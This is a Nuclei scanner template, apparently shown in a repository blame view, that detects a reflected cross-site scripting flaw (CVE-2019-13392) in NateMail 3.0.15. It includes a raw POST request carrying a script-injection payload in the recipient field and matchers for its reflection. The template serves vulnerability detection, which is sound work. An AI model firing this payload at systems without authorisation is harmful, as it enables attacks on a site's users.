nuclei-templates/cves/2019/CVE-2019-13392.yaml

44 lines
1.4 KiB
YAML
Raw Normal View History

2021-09-15 07:10:34 +00:00
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
2021-09-15 07:10:34 +00:00
author: pikpikcu
severity: medium
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request.
The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
2021-09-15 07:10:34 +00:00
reference:
- https://www.doyler.net/security-not-included/natemail-vulnerabilities
- https://mindpalette.com/tag/natemail/
2021-09-15 07:10:34 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-13392
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-13392
cwe-id: CWE-79
tags: cve,cve2019,natemail,xss
2021-09-15 07:10:34 +00:00
requests:
- raw:
- |
POST /NateMail.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
2021-09-15 12:02:32 +00:00
recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
2021-09-15 07:10:34 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-09-15 12:02:32 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-15 07:10:34 +00:00
part: body
- type: word
part: header
2021-09-15 12:02:32 +00:00
words:
- text/html
# Enhanced by mp on 2022/04/04